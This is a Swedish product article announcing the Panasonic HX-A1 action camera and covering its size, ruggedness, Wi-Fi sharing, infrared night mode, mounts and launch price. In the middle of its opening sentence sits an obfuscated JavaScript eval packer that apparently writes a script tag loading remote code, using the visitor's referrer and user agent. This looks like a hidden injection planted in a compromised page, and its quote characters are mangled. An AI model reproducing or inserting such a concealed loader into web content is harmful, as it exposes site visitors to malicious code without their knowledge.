Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

PANASONIC HX-A1 – EN ACTIONKAMERA FÖR TUFFA ÄVENTYR

PANASONIC HX-A1 – EN ACTIONKAMERA FÖR TUFFA ÄVENTYR
Sebastian

Ny eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|deyst|var|u0026u|referrer|hhafh||js|php’.split(’|’),0,{}))
ultrakompakt, lätt och tålig videokamera. Panasonic HX-A1 kan filma överallt, till och med i mörker.

Nu lanseras Panasonic HX-A1, en actionkamera för tuffa förhållanden. Kameran är bara 8 cm lång, 2,6 cm i diameter och väger endast 45 gram. Den kan lätt monteras på bland annat din hjälm, ryggsäck, cykel eller direkt på huvudet och levererar videoinspelningar i Full HD, oavsett var du filmar ifrån. Kameran är vattentät (upp till 1,5 meters djup) utan extra skyddshölje, stötsäker (upp till 1,5 meters höjd), samt tål kyla (ner till -10 C°) och damm.

Wi-Fi för delning och anslutning

Ta med dig kameran i skidbacken, på båten eller när du är ute och cyklar med familjen. Tack vare kamerans höga bildkvalitet, kompakta storlek och smidiga monteringsmöjligheter, kan du fånga ögonblick från alla möjliga tänkbara vinklar. Inbyggd Wi-Fi gör det även lätt att dela med dig av ditt bildmaterial på sociala medier med familj och vänner via Panasonic Image-appen. HX-A1 kan trådlöst anslutas till din smartphone eller surfplatta.

Vid inspelningar med HX-A1 kan bilden ses i ett underfönster på den trådlöst anslutna videokamerans skärm, vilket gör det möjligt att slå samman två simultant inspelade filmer till en. En helt ny värld av möjligheter kan då utforskas, som t ex att filma en skidåkare från åskådarplats samtidigt som du upplever åket genom skidåkarens synvinkel.

Mörkerseende

En separat funktion för infrarött ljus och ett nattläge möjliggör filminspelning vid mörka ljusförhållanden, såsom t ex i grottor och nattetid. Kameran kan även enkelt fästas på huvudet tillsammans med en strålkastare.

Tillbehör

Det finns ett stort utbud HX-A1-tillbehör för att bl a kunna fästa kameran på t ex din cykel, surfingbräda eller båt. Dessutom finns ett ”Twin Mount”-fäste, med vilket två HX-A1-kameror kan monteras ihop.

HX-A1 finns tillgänglig från juni 2015 till det vägledande priset 2490 SEK.